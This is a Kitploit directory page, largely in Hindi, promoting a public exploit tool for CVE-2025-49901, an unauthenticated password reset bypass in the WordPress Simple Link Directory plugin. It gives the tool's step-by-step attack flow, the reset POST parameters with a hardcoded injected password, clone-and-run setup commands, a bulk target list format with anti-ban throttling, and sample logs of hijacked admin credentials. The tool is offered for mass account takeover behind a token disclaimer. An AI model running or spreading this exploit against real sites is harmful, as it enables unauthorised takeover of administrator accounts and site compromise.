Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-49901 — WordPress Simple Link Directory Plugin < 14.8.1 उच्च प्राथमिकता वाली Broken Authentication भेद्यता के प्रति संवेदनशील है | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-49901
प्रमाणीकरण और प्राधिकरणटोहीपासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषण
GitHubnxploited/cve-2025-49901

CVE-2025-49901

WordPress Simple Link Directory Plugin < 14.8.1 उच्च प्राथमिकता वाली Broken Authentication भेद्यता के प्रति संवेदनशील है

रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-49901

WordPress Simple Link Directory Plugin < 14.8.1 उच्च प्राथमिकता वाले टूटे हुए प्रमाणीकरण के प्रति संवेदनशील है।

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════╗
║        CVE-2025-49901  ·  Simple Link Directory  ·  qc-opd       ║
║           Authentication Bypass → Password Reset → RCE           ║
╚═══════════════════════════════════════════════════════════════════╝

CVE CVSS Plugin Auth Python Author


▸ भेद्यता

SLD पृष्ठों पर उजागर qc-opd पासवर्ड रीसेट फ़ॉर्म बिना किसी टोकन, ईमेल पुष्टि, या क्षमता जाँच के माध्यम से उपयोगकर्ता की पहचान सत्यापित किए बिना एक उपयोगकर्ता नाम और नया पासवर्ड स्वीकार करता है। एक बिना प्रमाणीकृत हमलावर WordPress उपयोगकर्ता नामों की गणना (एन्यूमरेट) कर सकता है, किसी भी खाते के लिए रीसेट फ़ॉर्म सबमिट कर सकता है, और इंजेक्ट किए गए पासवर्ड के साथ तुरंत प्रमाणित हो सकता है — लक्षित उपयोगकर्ता से बिना किसी इंटरैक्शन के व्यवस्थापक पहुँच प्राप्त कर सकता है।


▸ हमले का प्रवाह

root@kitploit:~
┌─────────────────────────────────────────────────────────┐
│  1. Locate SLD reset page                               │
│     Probe 28+ paths → match: "sld" + "_wpnonce" + form  │
│                                                         │
│  2. Extract nonce                                       │
│     Parse _wpnonce from HTML / JS / qc-opd-nonce        │
│                                                         │
│  3. Enumerate usernames                                 │
│     /?author=1..10  +  /wp-json/wp/v2/users  + hostname │
│                                                         │
│  4. Reset password for each username                    │
│     POST qc-restore-pwd=restore                         │
│         qc-uid=<username>                               │
│         pass=newhackerpass123                           │
│         _wpnonce=<nonce>                                │
│                                                         │
│  5. Verify access (dual mode)                           │
│     Session mode  → cookie check + /wp-admin/ probes    │
│     Password mode → wp-login.php + admin panel check    │
│                                                         │
│  6. Write confirmed hits → scan_results/reset_mass_success.txt │
└─────────────────────────────────────────────────────────┘

▸ सेटअप

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-49901.git
cd CVE-2025-49901
pip install requests colorama urllib3
python3 CVE-2025-49901.py

requirements.txt

root@kitploit:~
requests>=2.28.0
colorama>=0.4.6
urllib3>=1.26.0

▸ उपयोग

root@kitploit:~
Targets list file          →  list.txt  (one host per line)
Threads                    →  default 5
HTTP timeout               →  default 10s
Per-user delay MIN/MAX     →  anti-ban throttle  (default 0.3 / 0.7s)
Delay between sites        →  default 1.0s
Output file                →  scan_results/reset_mass_success.txt

लक्ष्य प्रारूप:

root@kitploit:~
https://target1.com
target2.com
http://target3.com/wordpress

सभी रीसेट के लिए इंजेक्ट किया गया निश्चित पासवर्ड:

root@kitploit:~
newhackerpass123

▸ उपयोगकर्ता नाम एन्यूमरेशन स्रोत

विधिएंडपॉइंट
लेखक पुनर्निर्देशन/?author=1 →

▸ व्यवस्थापक सत्यापन तर्क

प्रत्येक रीसेट प्रयास के बाद उपकरण दो स्वतंत्र विधियों का उपयोग करके पहुँच सत्यापित करता है:

root@kitploit:~
Session mode   →  checks wordpress_logged_in cookie + /wp-admin/ indicators
Password mode  →  full wp-login.php POST + multi-path admin panel probe

जाँचे गए व्यवस्थापक संकेतक:

root@kitploit:~
id="adminmenu"  ·  id="wpadminbar"  ·  id="wpwrap"
users.php  ·  plugins.php  ·  plugin-install-tab  ·  upload-plugin

▸ टर्मिनल आउटपुट प्रारूप

root@kitploit:~
[HH:MM:SS] [https://target.com] NONCE: OK   | RESET: OK   | ACCESS: 1 HIT
[HH:MM:SS] [https://target2.com] NONCE: FAIL | RESET: -    | ACCESS: 0 HIT

▸ आउटपुट फ़ाइल

scan_results/reset_mass_success.txt

root@kitploit:~
[2025-06-01T14:22:10] https://target.com - account=admin  pass=newhackerpass123  mode=password
[2025-06-01T14:22:18] https://target.com - account=editor pass=newhackerpass123  mode=session

▸ लेखक

root@kitploit:~
Nxploited (Khaled Alenazi)
GitHub   →  https://github.com/Nxploited
Telegram →  @KNxploited

GitHub Telegram


▸ अस्वीकरण

root@kitploit:~
FOR AUTHORIZED SECURITY RESEARCH AND EDUCATION ONLY.

The author bears no responsibility for use against systems
the operator does not own or have explicit written permission to test.

Unauthorized use violates the CFAA, CMA, and equivalent laws worldwide.
You alone are responsible for your actions.

© 2025 Nxploited · Simple Link Directory < 14.8.1 · 14.8.1 में ठीक किया गया

टूल डाउनलोड करें
CVECVE-2025-49901
CVSS9.8 गंभीर — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ADPCISA-ADP
Pluginquantumcloud Simple Link Directory (qc-simple-link-directory)
Affectedसभी संस्करण < 14.8.1
Authकिसी की आवश्यकता नहीं
Typeवैकल्पिक पथ के माध्यम से प्रमाणीकरण बाईपास (CWE-288)
CWECWE-288 · वैकल्पिक पथ या चैनल का उपयोग करके प्रमाणीकरण बाईपास
/?author=10
REST API/wp-json/wp/v2/users
होस्टनामफ़ॉलबैक के रूप में डोमेन का पहला लेबल
हार्डकोडेडadmin हमेशा शामिल